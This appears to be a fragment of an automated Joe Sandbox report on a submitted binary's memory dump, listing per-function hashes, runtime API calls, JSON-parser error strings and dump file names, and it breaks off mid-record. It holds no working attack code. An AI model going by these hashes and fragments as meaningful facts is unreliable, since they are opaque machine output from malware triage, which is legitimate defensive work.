                                                                                    • API String ID: 3307324669-2799312399
                                                                                    • Opcode ID: 6f3cbb618948d474243898db91c4f48debdd5f39e4af72cff1b0860401d2f093
                                                                                    • Instruction ID: a4d68efac15e047a7db2cd22bae1a2a34c20b330be2dfc37b1f9c08a174aef9f
                                                                                    • Opcode Fuzzy Hash: 6f3cbb618948d474243898db91c4f48debdd5f39e4af72cff1b0860401d2f093
                                                                                    • Instruction Fuzzy Hash: 09F19B709082998BDF24DFA8C891BFEBBF5EF42304F64409DE4556B282DBB49D49CB50
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _strcspnstd::ios_base::getloctask$Mpunctctype
                                                                                    • String ID: @
                                                                                    • API String ID: 3192409786-2766056989
                                                                                    • Opcode ID: 74ddb74fc5c70ab9b256b2e5d7483df81f89fe077f469305839076394ac867b1
                                                                                    • Instruction ID: 3f7ed5a6778fb9ec1aaa3a96b65f82caf1ac6baec786ac25336ba456a6bb5eb0
                                                                                    • Opcode Fuzzy Hash: 74ddb74fc5c70ab9b256b2e5d7483df81f89fe077f469305839076394ac867b1
                                                                                    • Instruction Fuzzy Hash: EBF12AB1A082489FCB14DF98C891BEEBBF5FF49300F148199E519AB255DB34AE45CF90
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Yarn$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                    • String ID: bad locale name
                                                                                    • API String ID: 3904239083-1405518554
                                                                                    • Opcode ID: b48946ca9bbca41ad00ebe0c1e4d86776ff76615da01462ea5535a3779cb936e
                                                                                    • Instruction ID: 968ea651727b16accc8998fe81fece7f212a94bc4b975bfa6e617c83cbf063ea
                                                                                    • Opcode Fuzzy Hash: b48946ca9bbca41ad00ebe0c1e4d86776ff76615da01462ea5535a3779cb936e
                                                                                    • Instruction Fuzzy Hash: 85218CB0908649EBDB14EFD8D851BBEBBB4FF06304F0445ACE4126B382DB756A40C761
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9fc156c6de24bc3a2b4cf4ede5ab9497fa37395bf47937cdcba85c6299b25f03
                                                                                    • Instruction ID: 377faeccbd098148a9a53d14806cc9c687154feb24f23ab1d851110c1acabe88
                                                                                    • Opcode Fuzzy Hash: 9fc156c6de24bc3a2b4cf4ede5ab9497fa37395bf47937cdcba85c6299b25f03
                                                                                    • Instruction Fuzzy Hash: ECC1D574E043099FDB15DFA9D880BFD7BB0AF4A300F244559E551AB392C7B09AC2DB61
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ../$..\
                                                                                    • API String ID: 0-142607964
                                                                                    • Opcode ID: 8ccb105cb0478d5c26c5cbfe54eb2b122990d08aab2dae2e88f14d90c65641bd
                                                                                    • Instruction ID: 9867586ef7841624c151df74e3fe09d07632c25e5d52709bdb0a4d402def9863
                                                                                    • Opcode Fuzzy Hash: 8ccb105cb0478d5c26c5cbfe54eb2b122990d08aab2dae2e88f14d90c65641bd
                                                                                    • Instruction Fuzzy Hash: 330221F4904A188BCB24DF14DC95FA9B7B1EB84306F1441EDE619AB282DB309EC5CF59
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: std::ios_base::getloctask$Mpunctctype
                                                                                    • String ID: @
                                                                                    • API String ID: 703745775-2766056989
                                                                                    • Opcode ID: 04acd19fb56d8b6193065971eb0e42fcb5f265add971403f75e0546f7a7d5919
                                                                                    • Instruction ID: 308d6026492423a72d9ea66d9ba16371eeab6eba67a3459ab5562f5b801838b3
                                                                                    • Opcode Fuzzy Hash: 04acd19fb56d8b6193065971eb0e42fcb5f265add971403f75e0546f7a7d5919
                                                                                    • Instruction Fuzzy Hash: AAE10CB1A042489FCB04DF98C991AEEBBF5FF4A304F144199F519AB291DB34AD45CB90
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Mpunctshared_ptrstd::ios_base::getloctask
                                                                                    • String ID:
                                                                                    • API String ID: 1133065673-0
                                                                                    • Opcode ID: f289b5d7b68e0fb06fd6a3b3d96d9e3446789b5e357af6fa9cd11cbbdebeb2f4
                                                                                    • Instruction ID: 040a2b1da557730edbf4e9af8cfee29b08365bfcb1cb3f0557df8a3e4903ae68
                                                                                    • Opcode Fuzzy Hash: f289b5d7b68e0fb06fd6a3b3d96d9e3446789b5e357af6fa9cd11cbbdebeb2f4
                                                                                    • Instruction Fuzzy Hash: 6C712CB2904108AFCB14DFA8D891EEEBBF4FF49310F148159F526A7291DB34A905CFA0
                                                                                    APIs
                                                                                      • Part of subcall function 00C0D281: GetLastError.KERNEL32(00000000,00000000,00000000,00C0B710,?,?,00C12E05,?,00000000,00000040,00000000,00000000,00000040,?,00000000,00000080), ref: 00C0D286
                                                                                      • Part of subcall function 00C0D281: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00C12E05,?,00000000,00000040,00000000,00000000,00000040,?,00000000,00000080,00000000), ref: 00C0D324
                                                                                    • _free.LIBCMT ref: 00C0AE18
                                                                                    • _free.LIBCMT ref: 00C0AE31
                                                                                    • _free.LIBCMT ref: 00C0AE6F
                                                                                    • _free.LIBCMT ref: 00C0AE78
                                                                                    • _free.LIBCMT ref: 00C0AE84
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorLast
                                                                                    • String ID: C
                                                                                    • API String ID: 3291180501-1037565863
                                                                                    • Opcode ID: bb9b5cdb3e468a482a6e8c98f0487cecbdf482f3f4b72abec868064934f3fb7d
                                                                                    • Instruction ID: 1373b6762125289052bf4cb88a092f9f55a0806abbf222bc37236a92b4ee7e13
                                                                                    • Opcode Fuzzy Hash: bb9b5cdb3e468a482a6e8c98f0487cecbdf482f3f4b72abec868064934f3fb7d
                                                                                    • Instruction Fuzzy Hash: AFB13875901319DFDB24DF18C884AA9B3B4FB58304F5085AAE91AA7390D731AE90CF81
                                                                                    APIs
                                                                                    • std::ios_base::getloc.LIBCPMTD ref: 00BBC30E
                                                                                      • Part of subcall function 00BA5030: std::_Lockit::_Lockit.LIBCPMT ref: 00BA505D
                                                                                      • Part of subcall function 00BA5030: std::_Lockit::~_Lockit.LIBCPMT ref: 00BA512C
                                                                                    • _Mpunct.LIBCPMTD ref: 00BBC361
                                                                                    • task.LIBCPMTD ref: 00BBC389
                                                                                    • _Mpunct.LIBCPMTD ref: 00BBC3A2
                                                                                    • task.LIBCPMTD ref: 00BBC3CA
                                                                                      • Part of subcall function 00BB1D90: std::locale::locale.LIBCPMTD ref: 00BB1E17
                                                                                    • task.LIBCPMTD ref: 00BBC424
                                                                                    • std::ios_base::getloc.LIBCPMTD ref: 00BBC438
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: task$LockitMpunctstd::_std::ios_base::getloc$Lockit::_Lockit::~_std::locale::locale
                                                                                    • String ID:
                                                                                    • API String ID: 2072598532-0
                                                                                    • Opcode ID: 5aafa098ef6efdd8fb390b07eda58e0059d8437df1cea2ced9fcc8ca8d2da3bb
                                                                                    • Instruction ID: 3fe2ac79d7c4ac69615ad30d1e03a2f0ff5525ac5929431223a58ad929aea2c1
                                                                                    • Opcode Fuzzy Hash: 5aafa098ef6efdd8fb390b07eda58e0059d8437df1cea2ced9fcc8ca8d2da3bb
                                                                                    • Instruction Fuzzy Hash: 98914CB1904248DFDB15DFA4D891BEDBBF5FF49300F108299E41AAB281EB74AA44CF51
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _fwprintf
                                                                                    • String ID: %4x$%4x$\$u
                                                                                    • API String ID: 394020290-2611924604
                                                                                    • Opcode ID: ba54bb07be7f2f1fc68f00b2c4c89615c669c0af36bf93563b336eb5e79ee01f
                                                                                    • Instruction ID: 1ce78f3e85dbb61d3ef8f48ff824060d301cc1301735ef31731fc899fcc2b968
                                                                                    • Opcode Fuzzy Hash: ba54bb07be7f2f1fc68f00b2c4c89615c669c0af36bf93563b336eb5e79ee01f
                                                                                    • Instruction Fuzzy Hash: 35811A71D11209DFCB04CF98C890ABEBBB1FF49304F1489ADD425AB392D775AA45CB91
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: char_traits
                                                                                    • String ID: $
                                                                                    • API String ID: 1158913984-227171996
                                                                                    • Opcode ID: 1fa61fe281665352f8a11eceff139992d847ea14732788982b7a4baf2339d760
                                                                                    • Instruction ID: 08ae1fa8473cb2cda0d812b3239fd897e56ed5f8b2e28ae15207e4c157dc17db
                                                                                    • Opcode Fuzzy Hash: 1fa61fe281665352f8a11eceff139992d847ea14732788982b7a4baf2339d760
                                                                                    • Instruction Fuzzy Hash: A961E8B5D08109EFCB04DF94D892DEEB7F5BF4A304F104199E526A7252DB30AE40DB95
                                                                                    APIs
                                                                                    Strings
                                                                                    • Value is not convertible to Int64., xrefs: 00BB9FAD
                                                                                    • double out of Int64 range, xrefs: 00BB9ECF
                                                                                    • LargestUInt out of Int64 range, xrefs: 00BB9DFA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: task
                                                                                    • String ID: LargestUInt out of Int64 range$Value is not convertible to Int64.$double out of Int64 range
                                                                                    • API String ID: 1384045349-1108236385
                                                                                    • Opcode ID: 63b4c18d2a327a783cbdd45ee1405ee350f84fbb99b950f02524a446311cf8e7
                                                                                    • Instruction ID: 24257465667bb2625b4ac5f97cab84271279880d894f57d91ab6e7e701c34aee
                                                                                    • Opcode Fuzzy Hash: 63b4c18d2a327a783cbdd45ee1405ee350f84fbb99b950f02524a446311cf8e7
                                                                                    • Instruction Fuzzy Hash: 27716B709042699FCB24EF64CC95BEEB7B0AF06710F5082E9E51967291DB706F89CF81
                                                                                    APIs
                                                                                    Strings
                                                                                    • LargestInt out of UInt64 range, xrefs: 00BBA12A
                                                                                    • double out of UInt64 range, xrefs: 00BBA207
                                                                                    • Value is not convertible to UInt64., xrefs: 00BBA2E5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: task
                                                                                    • String ID: LargestInt out of UInt64 range$Value is not convertible to UInt64.$double out of UInt64 range
                                                                                    • API String ID: 1384045349-900115960
                                                                                    • Opcode ID: 8be771e83cceb31287ebc4b96fe6af0e6939c781aed42bf40d70ba2f0ee6e7f2
                                                                                    • Instruction ID: 733122238bf48eba7003461940a273735e2807695430e358f180612d4341f97f
                                                                                    • Opcode Fuzzy Hash: 8be771e83cceb31287ebc4b96fe6af0e6939c781aed42bf40d70ba2f0ee6e7f2
                                                                                    • Instruction Fuzzy Hash: 62716B709042699FCB24EF68CC91BEDB7B0AF15710F5086E9E51967281DBB05F89CF81
                                                                                    APIs
                                                                                      • Part of subcall function 00BB32C0: Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00BB3304
                                                                                    • task.LIBCPMTD ref: 00BBAAEC
                                                                                    • task.LIBCPMTD ref: 00BBAAFB
                                                                                    • task.LIBCPMTD ref: 00BBAB28
                                                                                    • task.LIBCPMTD ref: 00BBAB0A
                                                                                      • Part of subcall function 00BB5D80: std::bad_exception::~bad_exception.LIBCMTD ref: 00BB5D98
                                                                                    • task.LIBCPMTD ref: 00BBAB7D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: task$ProcessorVirtual$Concurrency::RootRoot::std::bad_exception::~bad_exception
                                                                                    • String ID: ' is not a number.
                                                                                    • API String ID: 3588740884-698141950
                                                                                    • Opcode ID: 7bb970308ca7d12f42122fd07ceedf8ff5ea3620d1e602e5ad3110f0e3a7538f
                                                                                    • Instruction ID: 25371e86dbee1c8ade54156b62afc217e3d3aead0130b2ec42fb67bbde47e8cc
                                                                                    • Opcode Fuzzy Hash: 7bb970308ca7d12f42122fd07ceedf8ff5ea3620d1e602e5ad3110f0e3a7538f
                                                                                    • Instruction Fuzzy Hash: D96138709102589FCB24EFA4C851BEDBBB4AF59300F0482D9E41977281EB705F88DFA1
                                                                                    APIs
                                                                                    • _swprintf.LIBCMTD ref: 00BC019E
                                                                                      • Part of subcall function 00BAC620: __vswprintf_s_l.LIBCONCRTD ref: 00BAC63E
                                                                                    • _swprintf.LIBCMTD ref: 00BC01DA
                                                                                      • Part of subcall function 00BBFC40: ___from_strstr_to_strchr.LIBCMT ref: 00BBFC4B
                                                                                    • _swprintf.LIBCMTD ref: 00BC0286
                                                                                    • _swprintf.LIBCMTD ref: 00BC02BF
                                                                                    • _swprintf.LIBCMTD ref: 00BC02EE
                                                                                    Strings
                                                                                    Memory Dump Source
